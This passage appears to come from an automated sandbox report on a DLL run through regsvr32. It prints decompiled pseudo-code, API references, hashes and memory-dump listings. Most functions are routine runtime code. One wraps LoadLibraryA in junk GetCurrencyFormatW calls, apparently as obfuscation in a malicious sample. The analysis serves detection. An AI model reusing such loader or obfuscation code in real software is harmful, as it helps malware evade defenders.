				if(_t8 == 0) {
					L6:
					_v20 =  *0x10039fd0;
					_v28 =  *0x10039fc8;
					asm("fsubr qword [ebp-0x18]");
					_v12 = _v28 / _v20 * _v20;
					asm("fld1");
					asm("fcomp qword [ebp-0x8]");
					asm("fnstsw ax");
					if((_t8 & 0x00000005) != 0) {
						return 0;
					} else {
						return 1;
					}
				} else {
					__eax = GetProcAddress(__eax, "IsProcessorFeaturePresent");
					if(__eax == 0) {
						goto L6;
					} else {
						_push(0);
						return __eax;
					}
				}
			}

APIs

GetModuleHandleA.KERNEL32(KERNEL32,1002361A), ref: 1002BDD6
GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 1002BDE6

Strings

IsProcessorFeaturePresent, xrefs: 1002BDE0
KERNEL32, xrefs: 1002BDD1

Memory Dump Source

Source File: 00000002.00000002.259635846.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.259568974.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259703759.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259750364.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259817552.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259866776.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259911607.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259942125.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259964401.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.260018017.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: IsProcessorFeaturePresent$KERNEL32
API String ID: 1646373207-3105848591
Opcode ID: 28f514ccd754736609f33c51daedfd0aeac528797be2892e988ff456b478d1a6
Instruction ID: e32e5489c0f8680f0bdbeaaa6a49d62586903b2bdf2b5a8f28566646894aba65
Opcode Fuzzy Hash: 28f514ccd754736609f33c51daedfd0aeac528797be2892e988ff456b478d1a6
Instruction Fuzzy Hash: 94F03A20A00E1ADAEF01ABA1AD492EF7BB8FB84746F9245A0D592E4099EF318074D251

Uniqueness

Uniqueness Score: -1.00%

Function 10003057 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16
libraryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E10003057(CHAR* _a4) {
				signed int _t2;

				_t2 = GetCurrencyFormatW(0, 0x11d4, L"eofgerDSQWzbxberfjXFSqwaKLIOrtyZD", 0, L"xadqsavcbdfewescGADW", 0x22b9);
				return  &((LoadLibraryA(_a4))[_t2 *  *0x100440d0]);
			}

0x10003070
0x1000308f

APIs

GetCurrencyFormatW.KERNEL32 ref: 10003070
LoadLibraryA.KERNEL32(?), ref: 10003086

Strings

xadqsavcbdfewescGADW, xrefs: 1000305D
eofgerDSQWzbxberfjXFSqwaKLIOrtyZD, xrefs: 10003064

Memory Dump Source

Source File: 00000002.00000002.259635846.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.259568974.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259703759.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259750364.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259817552.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259866776.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259911607.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259942125.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259964401.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.260018017.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: CurrencyFormatLibraryLoad
String ID: eofgerDSQWzbxberfjXFSqwaKLIOrtyZD$xadqsavcbdfewescGADW
API String ID: 1566795320-3161301136
Opcode ID: b688c3496de217a7e3c91dcb6abf11db8e2619d95133c7353a921a1f77c43571
Instruction ID: c8b8bc68fb586c21cf620b45a97a61bfa4732d23f622789b4932f32e46aada1a
Opcode Fuzzy Hash: b688c3496de217a7e3c91dcb6abf11db8e2619d95133c7353a921a1f77c43571
Instruction Fuzzy Hash: 37D05E32644230BAE2125790AD4AFC2AB14E75A752F028004FB04FD5E1C36004A08EA5

Uniqueness

Uniqueness Score: -1.00%

Function 10018DA4 Relevance: 6.3, APIs: 4, Instructions: 309
memoryCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E10018DA4(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags, signed int _a4, signed int _a8, signed int _a12, signed int _a16, char _a20, signed int _a44, signed int _a48, signed int _a52, intOrPtr _a56, signed int _a60, intOrPtr _a64, char _a68, intOrPtr _a92, signed int _a96, signed int _a100, intOrPtr _a104, signed int _a108, intOrPtr _a112, signed int _a116, char _a120) {
				signed int _v4;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				intOrPtr _v36;
				void* _v40;
				char _v124;
				char _v168;
				char _v176;
				char _v184;
				intOrPtr _v196;
				signed int* __ebp;
				signed int _t132;
				signed int _t138;
				signed int _t139;
				void* _t140;
				intOrPtr* _t145;
				intOrPtr* _t148;
				signed int _t149;
				signed int _t151;
				intOrPtr* _t152;
				void* _t154;
				intOrPtr* _t158;
				signed int _t163;
				intOrPtr _t164;
				intOrPtr* _t166;
				intOrPtr* _t168;
				void* _t179;
				intOrPtr _t182;
				signed int _t183;
				signed int _t185;
				signed int* _t186;
				void* _t187;
				intOrPtr* _t188;
				signed int _t202;
				signed int _t204;
				intOrPtr _t214;
				intOrPtr _t220;
				intOrPtr* _t222;
				intOrPtr _t223;
				signed int _t225;
				void* _t228;
				void* _t229;
				void* _t231;
				void* _t232;

				_t188 = __ecx;
				_t181 = __ebx;
				_t232 = _t231 - 0x74;
				_t225 =  &_v124;
				_t132 =  *0x10045580; // 0x771f5646
				_a116 = _t132 ^ _t225;
				_push(0x1c);
				E1001FBC4(E100344DD, __ebx, __edi, __esi);
				_t222 = __ecx;
				_v16 =  *((intOrPtr*)(__ecx + 0x14));
				_a4 =  *((intOrPtr*)(__ecx + 0x10));
				if( *((intOrPtr*)(__ecx + 0x48)) == 0) {
					_t138 =  *(__ecx + 8);
					__eflags = _t138;
					if(_t138 != 0) {
						_t215 =  &_a12;
						_t139 =  *((intOrPtr*)( *_t138 + 0xc))(_t138, 0x1003b18c,  &_a12,  &_a8);
						__eflags = _t139;
						if(_t139 >= 0) {
							E100157C0( &_a12,  &_a20, 0x1003b8b8);
							_a52 = _a52 | 0xffffffff;
							_a44 = 0;
							_a48 = 0;
							_a56 = 0x18;
							_a60 = 0;
							_a64 = 0x1fb;
							E100157C0( &_a12,  &_a68, 0x1003b8a0);
							_t145 = _a12;
							_a100 = _a100 | 0xffffffff;
							_t215 =  &_a20;
							_a92 = 0x1c;
							_a96 = 0;
							_a104 = 0x20;
							_a108 = 0;
							_a112 = 0x1e;
							_t183 =  *((intOrPtr*)( *_t145 + 0x10))(_t145, 2,  &_a20, 0x28, 0);
							__eflags = _t183;
							if(_t183 >= 0) {
								_t215 = 0;
								_v40 = _a8;
								_t148 = _a12;
								_v36 = 1;
								_v32 = 0;
								_v28 = 0;
								_v24 = 0;
								_t149 =  *((intOrPtr*)( *_t148 + 0x18))(_t148, 0, 0,  &_v40);
								__eflags = _t149;
								 *_t225 = _t149;
								if(_t149 >= 0) {
									 *((intOrPtr*)(_t222 + 0x14)) = _v32;
									_t151 = _v20;
									_a8 = _t151;
									 *(_t222 + 0x10) = _t151;
									_t152 = _a12;
									 *((intOrPtr*)(_t222 + 0x34)) = _v28;
									 *((intOrPtr*)( *_t152 + 8))(_t152);
									goto L32;
								} else {
									_t166 = _a12;
									 *((intOrPtr*)( *_t166 + 8))(_t166);
								}
								goto L50;
							} else {
								_t168 = _a12;
								 *((intOrPtr*)( *_t168 + 8))(_t168);
								_t139 = _t183;
							}
						}
					} else {
						_t139 = 0;
					}
					goto L51;
				} else {
					__eax =  *(__esi + 0x4c);
					__ecx =  *__eax;
					__edx =  &_a16;
					__eax =  *((intOrPtr*)(__ecx + 0x14))(__eax, 0x1003b39c, __edx);
					__eflags = __eax;
					 *__ebp = __eax;
					if(__eax < 0) {
						L51:
						 *[fs:0x0] = _v12;
						_pop(_t220);
						_pop(_t223);
						_pop(_t182);
						_t140 = E1001FBB5(_t139, _t182, _a116 ^ _t225, _t215, _t220, _t223);
						__eflags =  &_a120;
						return _t140;
					} else {
						__eax = _a16;
						__ecx =  *__eax;
						__edx =  &_a8;
						_push( &_a8);
						_push(0x1003b37c);
						_push(__eax);
						__eflags = __eax;
						if(__eflags >= 0) {
							__eax = _a8;
							__edx =  &_a12;
							_push( &_a12);
							_push(0x1003b4bc);
							_a12 = 0;
							__ecx =  *__eax;
							_push(__eax);
							__eflags = __eax;
							if(__eflags >= 0) {
								__eax = _a12;
								__ecx =  *__eax;
								__edx = __esi + 0x58;
								__edx =  *(__esi + 4);
								__edx =  *(__esi + 4) + 0xe8;
								__eflags = __edx;
								__eax =  *((intOrPtr*)( *__eax + 0x14))(__eax, __edx, __esi + 0x58);
								__eax = _a12;
								__ecx =  *__eax;
								__eax =  *((intOrPtr*)( *__eax + 8))(__eax);
							}
							__eax = _a8;
							__ecx =  *__eax;
							__eax =  *((intOrPtr*)( *__eax + 8))(__eax);
						}
						__eax = E10004D4A(__eflags, 0x14);
						__eflags = __eax - __edi;
						if(__eax == __edi) {
							__eax = 0;
							__eflags = 0;
						} else {
							__ecx = __eax;
							__eax = E100185F7(__eax, _a16);
						}
						 *(__esi + 0x50) = __eax;
						__eax = _a16;
						__ecx =  *__eax;
						__eax =  *((intOrPtr*)( *__eax + 8))(__eax);
						__eax =  *(__esi + 0x50);
						__ecx =  *__eax;
						__eflags =  *__eax - __edi;
						if(__eflags != 0) {
							__eflags = __eax;
							__eax = E100159E9(__ecx, __eax);
						}
						__eax = E10004D4A(__eflags, 0x28);
						__eflags = __eax - __edi;
						if(__eax == __edi) {
							__eax = 0;
							__eflags = 0;
						} else {
							__ecx = __eax;
							__eax = E10014659(__eax, __edi, 0x1f40);
						}
						__edx =  *(__esi + 0x50);
						 *(__esi + 0x54) = __eax;
						_push( *( *(__esi + 0x50)));
						__ecx = __eax;
						__eax =  *(__esi + 0x54);
						__ecx =  *(__esi + 0x50);
						 *(__ecx + 8) =  *(__esi + 0x54);
						__eax =  *(__esi + 0x54);
						__eax =  *( *(__esi + 0x54) + 0xc);
						__eflags = __eax - 0x3333333;
						 *(__esi + 0x10) = __eax;
						if(__eax <= 0x3333333) {
							__eax = __eax * 0x28;
							__imp__CoTaskMemAlloc(__eax);
							__ecx = 0;
							__eflags = __eax - __edi;
							__ecx = 0 | __eflags != 0x00000000;
							 *(__esi + 0x14) = __eax;
							if(__eflags != 0) {
								 *(__esi + 0x10) =  *(__esi + 0x10) * 0x28;
								__eax = E10020F40(__edi, __eax, __edi,  *(__esi + 0x10) * 0x28);
								__ecx =  *(__esi + 0x50);
								__eax = E10018619( *(__esi + 0x50));
								__ecx =  *(__esi + 0x50);
								__eax = E100159A6(__ecx);
								L32:
								__eflags =  *(_t222 + 0x10);
								_a16 = 0;
								if( *(_t222 + 0x10) > 0) {
									_t187 = 0;
									__eflags = 0;
									do {
										_t163 = E10004D4A(__eflags, 0x1c);
										_a8 = _t163;
										__eflags = _t163;
										_v4 = 0;
										if(_t163 == 0) {
											_t164 = 0;
											__eflags = 0;
										} else {
											_t164 = E1001B8FB(_t163, 0xa);
										}
										_v4 = _v4 | 0xffffffff;
										_a16 = _a16 + 1;
										 *((intOrPtr*)(_t187 +  *((intOrPtr*)(_t222 + 0x14)) + 0x24)) = _t164;
										_t187 = _t187 + 0x28;
										__eflags = _a16 -  *(_t222 + 0x10);
									} while (__eflags < 0);
								}
								_t185 = _v16;
								__eflags = _t185;
								if(_t185 != 0) {
									__eflags = _a4;
									if(_a4 > 0) {
										_t154 = 0xffffffdc;
										_t186 = _t185 + 0x24;
										_a16 = _a4;
										_a8 = _t154 - _v16;
										while(1) {
											_t202 =  *( *_t186 + 4);
											__eflags = _t202;
											_a4 = _t202;
											if(_t202 == 0) {
												goto L46;
											}
											while(1) {
												_t158 = E1000911A( &_a4);
												_t215 =  *_t222;
												 *((intOrPtr*)( *_t222 + 8))( *_t158, 1);
												__eflags = _a4;
												if(_a4 == 0) {
													goto L46;
												}
											}
											L46:
											E1001B823( *_t186);
											_t204 =  *_t186;
											__eflags = _t204;
											if(_t204 != 0) {
												 *((intOrPtr*)( *_t204 + 4))(1);
											}
											_t186 =  &(_t186[0xa]);
											_t127 =  &_a16;
											 *_t127 = _a16 - 1;
											__eflags =  *_t127;
											if( *_t127 != 0) {
												continue;
											}
											goto L49;
										}
									}
									L49:
									__imp__CoTaskMemFree(_v16);
								}
								L50:
								_t139 =  *_t225;
								goto L51;
							} else {
								_push(_t225);
								_t228 = _t232;
								_push(_t188);
								_v168 = 0x100442e0;
								E100209E8( &_v168, 0x1003e1e4);
								asm("int3");
								_push(_t228);
								_t229 = _t232;
								_push(_t188);
								_v176 = 0x10044378;
								E100209E8( &_v176, 0x1003e298);
								asm("int3");
								_push(_t229);
								_push(_t188);
								_v184 = 0x10044410;
								E100209E8( &_v184, 0x1003e2dc);
								asm("int3");
								_push(4);
								E1001FBC4(E10032E9B, _t181, 0, _t222);
								_t214 = E100105C8(0x104);
								_v196 = _t214;
								_t179 = 0;
								_v184 = 0;
								if(_t214 != 0) {
									_t179 = E1000E58E(_t214);
								}
								return E1001FC9C(_t179);
							}
						} else {
							__eax = 0x8007000e;
							goto L51;
						}
					}
				}
			}

APIs

__EH_prolog3.LIBCMT ref: 10018DBD
CoTaskMemAlloc.OLE32(?,?), ref: 10018EDB
_memset.LIBCMT ref: 10018EFD
CoTaskMemFree.OLE32(?), ref: 100190D9

Part of subcall function 10004D4A: _malloc.LIBCMT ref: 10004D64

Memory Dump Source

Source File: 00000002.00000002.259635846.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.259568974.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259703759.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259750364.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259817552.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259866776.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259911607.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259942125.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259964401.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.260018017.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Task$AllocFreeH_prolog3_malloc_memset
String ID:
API String ID: 2459298410-0
Opcode ID: b121ae2c8e829696b65b9efb5c59cf0f74438459b6ac44388d9d562fa2d0b33e
Instruction ID: a1cdd10b8d3f28a5117ac55e09806983a961173fe6bfd8d1acb233a2e2c4c6df
Opcode Fuzzy Hash: b121ae2c8e829696b65b9efb5c59cf0f74438459b6ac44388d9d562fa2d0b33e
Instruction Fuzzy Hash: C9C106B4600709EFCB15CF68C88499AB7F5FF88704B20891AF956CF291DB71EA85CB50

Uniqueness

Uniqueness Score: -1.00%

Function 10019C50 Relevance: 6.2, APIs: 4, Instructions: 186
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 70%

			E10019C50(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t83;
				intOrPtr* _t84;
				intOrPtr _t85;
				intOrPtr* _t86;
				intOrPtr _t101;
				intOrPtr* _t121;
				intOrPtr* _t122;
				intOrPtr* _t124;
				intOrPtr* _t126;
				intOrPtr* _t128;
				intOrPtr* _t130;
				intOrPtr* _t145;
				intOrPtr* _t151;
				intOrPtr* _t160;
				intOrPtr _t161;
				intOrPtr _t162;
				void* _t163;
				void* _t164;
				intOrPtr _t166;
				intOrPtr* _t167;
				void* _t168;
				intOrPtr _t180;

				_push(0x10);
				E1001FBC4(E100345BC, __ebx, __edi, __esi);
				_t166 = __ecx;
				 *((intOrPtr*)(_t168 - 0x1c)) = __ecx;
				 *((intOrPtr*)(__ecx)) = 0x1003892c;
				 *(_t168 - 4) = 0;
				if( *((intOrPtr*)(__ecx + 0x58)) == 0) {
					L11:
					while( *((intOrPtr*)(_t166 + 0x24)) != 0) {
						_t160 =  *((intOrPtr*)( *((intOrPtr*)(_t166 + 0x1c)) + 8));
						__eflags = _t160;
						if(_t160 == 0) {
							break;
						}
						_t151 =  *_t160;
						__eflags = _t151;
						if(_t151 == 0) {
							break;
						}
						 *((intOrPtr*)( *_t151 + 0xbc))( *((intOrPtr*)(_t160 + 8)), 0);
						 *((intOrPtr*)( *_t160 + 0x98)) = 0;
					}
					 *((intOrPtr*)(_t168 - 0x18)) = _t166 + 0x18;
					E1001B823(_t166 + 0x18);
					if( *((intOrPtr*)(_t166 + 0x40)) == 0) {
						L19:
						_t83 =  *((intOrPtr*)(_t166 + 8));
						if(_t83 != 0) {
							 *((intOrPtr*)( *_t83 + 8))(_t83);
						}
						_t84 =  *((intOrPtr*)(_t166 + 0xc));
						if(_t84 != 0) {
							 *((intOrPtr*)( *_t84 + 8))(_t84);
						}
						if( *((intOrPtr*)(_t166 + 0x14)) == 0) {
							L32:
							_t85 =  *((intOrPtr*)(_t166 + 0x34));
							if(_t85 != 0) {
								__imp__CoTaskMemFree(_t85);
							}
							_t136 =  *((intOrPtr*)(_t166 + 0x54));
							if( *((intOrPtr*)(_t166 + 0x54)) != 0) {
								E10018664(_t136,  *((intOrPtr*)( *((intOrPtr*)(_t166 + 0x50)))));
								E10014682( *((intOrPtr*)(_t166 + 0x54)));
							}
							_t161 =  *((intOrPtr*)(_t166 + 0x54));
							_t192 = _t161;
							if(_t161 != 0) {
								E10014682(_t161);
								_push(_t161);
								E10004D75(0, _t161, _t166, _t192);
							}
							_t162 =  *((intOrPtr*)(_t166 + 0x50));
							_t193 = _t162;
							if(_t162 != 0) {
								E10019A2F(_t162, _t193);
								_push(_t162);
								E10004D75(0, _t162, _t166, _t193);
							}
							_t86 =  *((intOrPtr*)(_t166 + 0x4c));
							if(_t86 != 0) {
								 *((intOrPtr*)( *_t86 + 8))(_t86);
							}
							_t167 =  *((intOrPtr*)(_t166 + 0x48));
							if(_t167 != 0) {
								 *((intOrPtr*)( *_t167 + 8))(_t167);
							}
							 *(_t168 - 4) =  *(_t168 - 4) | 0xffffffff;
							return E1001FC9C(E1001B91E( *((intOrPtr*)(_t168 - 0x18))));
						} else {
							 *((intOrPtr*)(_t168 - 0x10)) = 0;
							if( *((intOrPtr*)(_t166 + 0x10)) <= 0) {
								L31:
								__imp__CoTaskMemFree( *((intOrPtr*)(_t166 + 0x14)));
								goto L32;
							}
							_t163 = 0;
							do {
								_t101 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t166 + 0x14)) + _t163 + 0x24)) + 4));
								 *((intOrPtr*)(_t168 - 0x14)) = _t101;
								if(_t101 == 0) {
									goto L28;
								} else {
									goto L27;
								}
								do {
									L27:
									 *((intOrPtr*)( *((intOrPtr*)(E1000911A(_t168 - 0x14))) + 0x98)) = 0;
								} while ( *((intOrPtr*)(_t168 - 0x14)) != 0);
								L28:
								E1001B823( *((intOrPtr*)( *((intOrPtr*)(_t166 + 0x14)) + _t163 + 0x24)));
								_t145 =  *((intOrPtr*)( *((intOrPtr*)(_t166 + 0x14)) + _t163 + 0x24));
								if(_t145 != 0) {
									 *((intOrPtr*)( *_t145 + 4))(1);
								}
								 *((intOrPtr*)(_t168 - 0x10)) =  *((intOrPtr*)(_t168 - 0x10)) + 1;
								_t163 = _t163 + 0x28;
							} while ( *((intOrPtr*)(_t168 - 0x10)) <  *((intOrPtr*)(_t166 + 0x10)));
							goto L31;
						}
					}
					_t164 = 0;
					if( *((intOrPtr*)(_t166 + 0x38)) <= 0) {
						L17:
						if(_t180 != 0) {
							_push( *((intOrPtr*)(_t166 + 0x3c)));
							E10004D75(0, _t164, _t166, _t180);
							_push( *((intOrPtr*)(_t166 + 0x40)));
							E10004D75(0, _t164, _t166, _t180);
						}
						goto L19;
					}
					 *((intOrPtr*)(_t168 - 0x10)) = 0;
					do {
						__imp__#9( *((intOrPtr*)(_t166 + 0x40)) +  *((intOrPtr*)(_t168 - 0x10)));
						 *((intOrPtr*)(_t168 - 0x10)) =  *((intOrPtr*)(_t168 - 0x10)) + 0x10;
						_t164 = _t164 + 1;
					} while (_t164 <  *((intOrPtr*)(_t166 + 0x38)));
					_t180 =  *((intOrPtr*)(_t166 + 0x38));
					goto L17;
				}
				_t121 =  *((intOrPtr*)(__ecx + 0x50));
				if(_t121 == 0) {
					goto L11;
				}
				_t122 =  *_t121;
				_push(_t168 - 0x14);
				_push(0x1003b37c);
				_push(_t122);
				if( *((intOrPtr*)( *_t122))() < 0) {
					goto L11;
				}
				_t124 =  *((intOrPtr*)(_t168 - 0x14));
				if(_t124 == 0) {
					goto L11;
				}
				_push(_t168 - 0x10);
				_push(0x1003b4bc);
				 *((intOrPtr*)(_t168 - 0x10)) = 0;
				_push(_t124);
				if( *((intOrPtr*)( *_t124 + 0x10))() >= 0) {
					_t128 =  *((intOrPtr*)(_t168 - 0x10));
					if(_t128 != 0) {
						 *((intOrPtr*)( *_t128 + 0x18))(_t128,  *((intOrPtr*)(__ecx + 0x58)));
						_t130 =  *((intOrPtr*)(_t168 - 0x10));
						 *((intOrPtr*)( *_t130 + 8))(_t130);
					}
				}
				_t126 =  *((intOrPtr*)(_t168 - 0x14));
				 *((intOrPtr*)( *_t126 + 8))(_t126);
				goto L11;
			}

APIs

__EH_prolog3.LIBCMT ref: 10019C57
VariantClear.OLEAUT32(?), ref: 10019D1B
CoTaskMemFree.OLE32(?,00000010), ref: 10019DC8
CoTaskMemFree.OLE32(?,00000010), ref: 10019DD6

Memory Dump Source

Source File: 00000002.00000002.259635846.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.259568974.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259703759.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259750364.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259817552.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259866776.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259911607.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259942125.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259964401.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.260018017.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: FreeTask$ClearH_prolog3Variant
String ID:
API String ID: 365290523-0
Opcode ID: cd38f89cae56ad47c5dcbd5386d246e758d2adde0798c45e4cdf38565e7e9628
Instruction ID: f4ca11870bf7736933ae268dd06283376a7c22ef50caea19de43a80b2043cb75
Opcode Fuzzy Hash: cd38f89cae56ad47c5dcbd5386d246e758d2adde0798c45e4cdf38565e7e9628
Instruction Fuzzy Hash: C6711475A00A42DFCB60CFA8C9C586AB7F6FF48304762486DE5469BA61CB31FD81CB51

Uniqueness

Uniqueness Score: -1.00%

Function 1001987A Relevance: 6.2, APIs: 4, Instructions: 173
windowCOMMON

Download Yara Rule

C-Code - Quality: 34%

			E1001987A(signed int __ecx, void* __edx) {
				signed int _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				signed int _v24;
				struct tagRECT _v40;
				struct tagRECT _v56;
				char _v76;
				intOrPtr _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t63;
				signed int _t64;
				intOrPtr _t70;
				signed int _t72;
				signed int _t73;
				signed int _t75;
				intOrPtr* _t77;
				signed int _t78;
				intOrPtr* _t80;
				signed int _t81;
				intOrPtr* _t82;
				intOrPtr* _t84;
				signed int _t86;
				signed int _t88;
				signed int _t92;
				intOrPtr* _t99;
				signed int _t100;
				signed int _t126;
				intOrPtr _t127;
				void* _t144;
				void* _t147;
				intOrPtr* _t148;
				signed int** _t150;
				signed int* _t151;
				signed int _t154;
				signed int _t156;
				void* _t158;
				void* _t161;

				_t144 = __edx;
				_t126 = __ecx;
				_t158 = _t161;
				_t154 = __ecx;
				_t63 =  *((intOrPtr*)(__ecx + 4));
				_push(_t147);
				if(_t63 != 0) {
					_t64 =  *(_t63 + 0x28);
					__eflags = _t64;
					if(_t64 == 0) {
						goto L4;
					} else {
						_t126 = _t64;
						_t72 = E1000BBDF(0, _t126, _t147);
						__eflags = _t72;
						_v8 = _t72;
						if(_t72 == 0) {
							goto L4;
						} else {
							_t73 = IsWindowVisible( *(_t72 + 0x20));
							asm("sbb eax, eax");
							_t75 =  ~_t73 + 1;
							__eflags = _t75;
							_v24 = _t75;
							if(_t75 != 0) {
								GetWindowRect( *(E1000A8F0(0, _t126, _t158, GetDesktopWindow()) + 0x20),  &_v56);
								GetWindowRect( *(_v8 + 0x20),  &_v40);
								asm("cdq");
								asm("cdq");
								__eflags = _v56.right - _v56.left - _t144;
								E1000EF54(_v8, _v56.right - _v56.left - _t144 >> 1, _v56.bottom - _v56.top - _t144 >> 1, 0, 0, 0);
								E1000EF92(_v8, 1);
							}
							_t77 =  *((intOrPtr*)( *((intOrPtr*)(_t154 + 4)) + 0x50));
							_t148 = _t154 + 0x48;
							_t78 =  *((intOrPtr*)( *_t77))(_t77, 0x100388c0, _t148);
							__eflags = _t78;
							if(_t78 < 0) {
								_t80 =  *((intOrPtr*)( *((intOrPtr*)(_t154 + 4)) + 0x50));
								_t81 =  *((intOrPtr*)( *_t80))(_t80, 0x10038918,  &_v16);
								__eflags = _t81;
								if(_t81 >= 0) {
									_t82 = _v16;
									 *((intOrPtr*)( *_t82 + 0x14))(_t82,  &_v20);
									_t84 = _v16;
									 *((intOrPtr*)( *_t84 + 8))(_t84);
									_t86 = _v20;
									__eflags = _t86;
									if(_t86 != 0) {
										_t150 = _t154 + 8;
										_v12 =  *((intOrPtr*)( *_t86))(_t86, 0x1003b17c, _t150);
										_t88 = _v20;
										 *((intOrPtr*)( *_t88 + 8))(_t88);
										_t81 = _v12;
										__eflags = _t81;
										if(__eflags >= 0) {
											_t151 =  *_t150;
											 *( *_t151)(_t151, 0x1003b16c, _t154 + 0xc);
											goto L21;
										}
									} else {
										_t81 = 0x80004005;
									}
								}
							} else {
								_t99 =  *_t148;
								_t151 = _t154 + 0x4c;
								_t100 =  *((intOrPtr*)( *_t99 + 0xc))(_t99, 0, 0x1003b40c, _t151);
								__eflags =  *_t151;
								_v12 = _t100;
								if( *_t151 == 0) {
									_v12 = 0x80004003;
								}
								__eflags = _v12;
								if(__eflags >= 0) {
									L21:
									_t92 = E10018DA4(0, _t154, _t151, _t154, __eflags);
									__eflags = _v24;
									_t156 = _t92;
									if(_v24 != 0) {
										__eflags = _v40.right - _v40.left;
										E1000EF54(_v8, _v40.left, _v40.top, _v40.right - _v40.left, _v40.bottom - _v40.top, 0);
										E1000EF92(_v8, 0);
									}
									_t81 = _t156;
								} else {
									__eflags = _v24;
									if(_v24 != 0) {
										__eflags = _v40.right - _v40.left;
										E1000EF54(_v8, _v40.left, _v40.top, _v40.right - _v40.left, _v40.bottom - _v40.top, 0);
										E1000EF92(_v8, 0);
									}
									_t81 = _v12;
								}
							}
							return _t81;
						}
					}
				} else {
					L4:
					_push(_t158);
					_push(_t126);
					_v76 = 0x10044410;
					E100209E8( &_v76, 0x1003e2dc);
					asm("int3");
					_push(4);
					E1001FBC4(E10032E9B, 0, _t147, _t154);
					_t127 = E100105C8(0x104);
					_v88 = _t127;
					_t70 = 0;
					_v76 = 0;
					if(_t127 != 0) {
						_t70 = E1000E58E(_t127);
					}
					return E1001FC9C(_t70);
				}
			}

APIs

IsWindowVisible.USER32(?), ref: 100198AB
GetDesktopWindow.USER32 ref: 100198BB
GetWindowRect.USER32 ref: 100198D4
GetWindowRect.USER32 ref: 100198E0

Memory Dump Source

Source File: 00000002.00000002.259635846.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.259568974.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259703759.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
